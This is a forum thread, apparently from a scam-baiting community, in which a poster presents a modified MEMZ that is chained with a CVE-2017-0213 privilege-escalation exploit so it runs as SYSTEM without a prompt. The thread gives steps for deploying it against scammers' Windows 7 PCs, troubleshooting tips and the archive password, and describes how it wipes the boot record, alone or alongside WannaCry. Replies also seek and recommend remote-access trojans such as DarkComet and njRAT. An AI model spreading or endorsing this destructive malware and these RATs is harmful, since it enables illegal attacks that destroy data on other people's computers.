Enhanced MEMZ

Hey Guys!

I’ve recently watched this video from @ScammerRevolts and was really happy to see this scammers PC being infected with WannaCry. Unfortunately the scammer didn’t click on the admin popup from MEMZ, so only WannaCry was running.

This was the moment when I thought: “It must be possible to start MEMZ as easy as WannaCry, without user input.

And today, I can present you this: MEMZ-Destructive v5.0
This version of MEMZ doesn’t have a silly warning like “THIS IS CONSIDERED MALWARE”! No, it simply starts and does its thing. Even without an admin popup!

But how does it work?

I’ve combined MEMZ with an exploit for CVE-2017-0213, which works on Win7 and starts MEMZ with NT AUTHORITY/SYSTEM rights. Not even the taskmanager can close MEMZ if the privileges are elevated this high.

And now for the most important part: How to use it?

  1. Step: Download from the link above (Warning: This is malware. DO NOT EVER RUN THIS ON YOUR REAL PC! I am not responsible for anything you do with MEMZ.)
  2. Step: There are several files in a .zip file, encrypted using a password so that you can’t extract and run them by mistake (pass included in the .zip file). Extract the files.
  3. Step: Take the file that best fits the PC. There are both x86 and x64 versions.
    (Annotation: There are three MEMZ files in the .zip. The file called “MEMZ_NoGui” does not include the exploit and is there for tesing/dev purposes.
  4. Step: Enjoy!

TL;DR
Download from the Link and execute MEMZ_x86 or MEMZ_x64. Then the PC is f*cked.

IMPORTANT NOTICE (Troubleshooting)

The Exploit is a bit unstable. I tested it on Win7 x86 Sp0/Sp1 and Win7 x64 Sp0. Should for some unknown reason MEMZ not work for you (or on the scammers PC), just do the following:

  • If there’s an admin prompt trying to open cmd.exe, ignore it. You can type yes, but that defies the reason i programmed this (we want this to work without user input)
  • Just give a doubleklick on “elevatex86.exe” (“elevatex64.exe”). Or two. Just smash that Mousebutton until it works (that really helps!!)

Happy Scammer-Hunting and PC-Trashing!
- Steve

4 Likes

haha nice! Funny thing is I just used the old version on a scammer XD ima have to try this one out.

1 Like

I would be really happy if I could see that in one of your videos! :grin: Hope that it works.

(And if not: Just tell me what happend/ what didn’t happen and I try to fix the error)

1 Like

Brilliant mate! Nice work indeed. :+1:

Does this just trash windows or whole PC?

Yah…Nice…You Should Do MEMZ Attack on More Scammers

MEMZ itself will first annoy the user really hard wile overwriting the MBR/GPT on the hard drive with NyanCat. That means the data on the drive is still intact, but you can’t boot into windows anymore. If you know what you’re doing it isn’t hard to restore windows, but if you use MEMZ and WannaCry at the same time, the data will end being encrypted while you can’t use your operating system anymore.

In any case, you indeed can use your PC after formatting everything and deleting all data, but the important part is that the scammers lose all their data and have a PC less to scam people with.

1 Like

I cannot seem to get it to work on windows 10. I not Able to get it unlocked. I Have been trying to get the pass word unlocked & use it on my Virtual Machine… Forgive me I am Still New To Computes & Intend to use this on the scammers. I Also Need A DardkComet For Use Against Them & Have not Found A Clean Copy To Put In My Computer.

I’m Still Having Trouble Getting The Files To Open, Allow Me To Use The Pass Word, On My Orical VM. :(:frowning:

First of all: The new version is avaible in this post. Unfortunately the exploit isn’t intended to work on Windows 10 (because most of these scammers use Windows 7) but I’m currently working on it. The password for all the archives is “infected” (without quotation marks or spaces).

As for the DarkComet Download, I can recommend this post from @ScammerRevolts as it is the only clean version i found so far.
You could also try other RAT’s like njRAT, Babylon RAT or Revenge RAT.

@Steve Great job on this! cant wait to see it in action against those scumbags.

Trying to find this clean version of DarkComet.
Is the link broken?